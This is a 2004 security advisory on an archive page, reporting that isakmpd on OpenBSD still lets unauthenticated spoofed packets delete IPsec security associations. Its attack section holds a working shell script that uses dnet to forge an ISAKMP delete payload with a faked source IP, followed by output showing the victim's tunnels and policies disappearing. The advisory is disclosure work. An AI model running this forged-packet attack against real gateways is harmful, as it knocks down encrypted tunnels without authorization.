isakmpdAgain.txt

isakmpdAgain.txt: Posted Jun 10, 2004; Authored by Thomas Walpuski; Unauthorized deletion of IPsec SAs is still possible using a delete payload piggybacked on an initiation of main mode with the latest version of isakmpd.; tags | advisory; SHA-256 | c5d443ed4065bde5c240457b08dcb81606ea790ee65250147c49eddf9744dc54; Download | Favorite | View

isakmpdAgain.txt

1 Abstract

  For nearly 10 months a handful of OpenBSD-developers is trying to fix
  a plethora of payload handling flaws in isakmpd. On 2004/01/13 they
  released something like a final patch to a broader public. The patch
  protects against some specific attacks, but does not solve the
  problem. 

2 Description

  Unauthorized deletion of IPsec SAs is still possible using a delete
  payload piggybacked on a initiation of main mode.

  For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

  All (recent) versions of isakmpd are affected. The attack has been
  successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

  Here we go. There is an IPsec tunnel between sg-a and sg-b:

    sg-a# cat /kern/ipsec | grep SPI
    SPI = 97e49ca2, Destination = <sg-a's IP address>, Sproto = 50
    SPI = 901e38d9, Destination = <sg-b's IP address>, Sproto = 50

  The attacker built some little script, because this time he wants to
  shoot down a bunch of IPsec SAs:

    attacker# cat during_these_hostile_and_trying_times_and_what-not
    #!/bin/sh
    if [ ! $# -eq 3 ]; then
      echo "usage: $0 <faked-src> <victim> <spi>";
      exit;
    fi
    
    src=$1; dst=$2
    spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
    cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
    
    dnet hex \
      $cky_i \
      "\x00\x00\x00\x00\x00\x00\x00\x00" \
      "\x01\x10\x02\x00" \
      "\x00\x00\x00\x00" \
      "\x00\x00\x00\x58" \
        "\x0c\x00\x00\x2c" \
        "\x00\x00\x00\x01" \
        "\x00\x00\x00\x01" \
          "\x00\x00\x00\x20" \
          "\x01\x01\x00\x01" \
          "\x00\x00\x00\x18" \
          "\x00\x01\x00\x00" \
          "\x80\x01\x00\x05" \
          "\x80\x02\x00\x02" \
          "\x80\x03\x00\x01" \
          "\x80\x04\x00\x02" \
        "\x00\x00\x00\x10" \
        "\x00\x00\x00\x01" \
        "\x03\x04\x00\x01" \
        $spi |
    dnet udp sport 500 dport 500 |
    dnet ip proto udp src $src dst $dst |
    dnet send

  He fires up his script with appropriate parameters:
    
    attacker# ./during_these_hostile_and_trying_times_and_what-not \
    > sg-b sg-a 901e38d9

  And the victim's IPsec SAs _and_ policies fade away almost
  instantaneous:
    
    sg-a# cat /kern/ipsec  
    Hashmask: 31, policy entries: 0

5 Solution?

  There are no bug fixes, yet.

Thomas Walpuski

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

isakmpdAgain.txt

isakmpdAgain.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

isakmpdAgain.txt

Share This

isakmpdAgain.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems